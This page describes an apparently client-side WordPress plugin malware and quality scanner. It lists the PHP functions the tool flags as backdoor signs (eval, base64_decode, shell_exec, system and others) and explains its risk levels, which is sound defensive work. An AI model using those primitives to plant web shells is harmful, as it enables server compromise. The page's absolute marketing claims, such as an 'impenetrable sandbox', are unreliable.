PluginLib
Plugin Vulnerability & Quality Checker
Advanced Static Code Analysis & Malware Scanner. Upload a plugin ZIP to analyze its codebase, check for hidden backdoors, and verify WordPress repository standards (readme.txt).
base64_decode() or eval() for valid reasons (e.g., complex frameworks or custom compilers). A "High Risk" flag means you should manually review the code snippet, it does not always guarantee the presence of malware.
Plugin Meta Data
- Name: Unknown
- Version: Unknown
- Total Files: 0
- PHP Files Scanned: 0
Readme.txt Standards
- Stable Tag: Missing
- Requires WP: Missing
- Tested Up To: Missing
- Has Changelog: No
Security Engine Heuristics
- Path Traversal Check: Passed
- Obfuscation (Base64): 0 found
- Dangerous Execution: 0 found
- Remote Payloads: 0 found
Static Analysis & Code Quality Findings
| Severity | File Path | Detection Rule | Matched Code Snippet / Details |
|---|
No suspicious patterns or quality issues found during static analysis.
The Ultimate WordPress Plugin Vulnerability Checker & Malware Scanner
WordPress powers over 43% of the internet. With over 60,000 free plugins in the official repository and thousands of premium themes, third-party code is the number one vector for website hacks. Our advanced Plugin Vulnerability Checker allows developers and site owners to perform deep static code analysis and WordPress coding standards verification to ensure their stack is completely secure.
Why You Need to Scan WP Plugins
Many site owners make the mistake of downloading "nulled" (cracked) premium plugins from unofficial sources. These files are almost always injected with hidden backdoors, SEO spam links, or crypto-miners. Furthermore, even legitimate plugins from trusted developers can contain severe vulnerabilities like SQL Injections (SQLi), Cross-Site Scripting (XSS), or Remote Code Execution (RCE) flaws.
Scanning your plugins before uploading them to your live server is a mandatory security best practice. If a vulnerability is discovered, our tool provides an immediate alert so you can delete the malicious file before it breaches your server.
How Our Sandboxed Static Analysis Works
Traditional malware scanners require you to upload your `.zip` file to a server. If the server is not properly containerized (using Docker or isolated VMs with read-only filesystems), analyzing malware can actually infect the server itself! This is known as a Sandbox Escape.
We solved this problem using cutting-edge browser technologies. Our scanner utilizes a 100% Client-Side JSZip Sandbox. When you select a plugin ZIP file, it never leaves your computer. Your browser's memory acts as an impenetrable sandbox. The JavaScript engine extracts the files locally, reads the raw text, and performs a lightning-fast Static Application Security Testing (SAST) scan. Because the code is never passed to a PHP interpreter, it is impossible for the malware to execute.
Dangerous PHP Functions We Detect
Our heuristic engine scans every .php file inside the plugin ZIP for known malicious footprints. These include:
- eval() and assert(): These functions execute arbitrary strings as PHP code. While sometimes used legitimately, they are the primary mechanism for hiding malicious payloads.
- base64_decode() and gzinflate(): Hackers use these to obfuscate (scramble) their malicious code so standard antivirus scanners can't read it. Seeing these combined with
evalis a massive red flag. - shell_exec(), exec(), system(), and passthru(): These functions interact directly with the underlying Linux server operating system. A standard WordPress plugin rarely needs to run bash commands. Finding these usually indicates a severe backdoor or web shell.
- Remote Payloads: We scan for embedded external URLs (like raw GitHub gists or suspicious IP addresses) that the plugin might use to download stage-2 malware after installation.
Checking WordPress Repository Standards (readme.txt)
In addition to malware scanning, our tool acts as a Plugin Quality Checker. Every plugin submitted to the official WordPress repository must contain a properly formatted readme.txt file. Our parser reads this file to extract critical metadata:
- Stable Tag: Verifies if the plugin is properly versioned.
- Requires at least: Ensures the plugin explicitly states the minimum WordPress core version needed to run, preventing fatal errors on outdated sites.
- Tested up to: An outdated "Tested up to" tag usually means the plugin is abandoned and may lack modern security patches.
Understanding Risk Levels & False Positives
After a scan, our engine assigns a risk level. However, please remember that False Positives are possible. Static code analysis uses regex patterns. A legitimate developer might use base64_decode() for a valid API integration. Always review the flagged code manually:
- Safe: No suspicious patterns found. (Note: Static analysis cannot catch everything. Always use plugins from trusted sources).
- Low / Quality Issue: Usually means the plugin is missing a
readme.txtfile or has formatting errors. - Medium / Warning: Found base64 encoding or file system modifications. Might be legitimate, but warrants manual review.
- High: Dangerous execution functions (exec, system) detected. Do not use unless you wrote the code yourself.
- Critical: Confirmed backdoor signatures or obfuscated eval payloads. Delete the file immediately.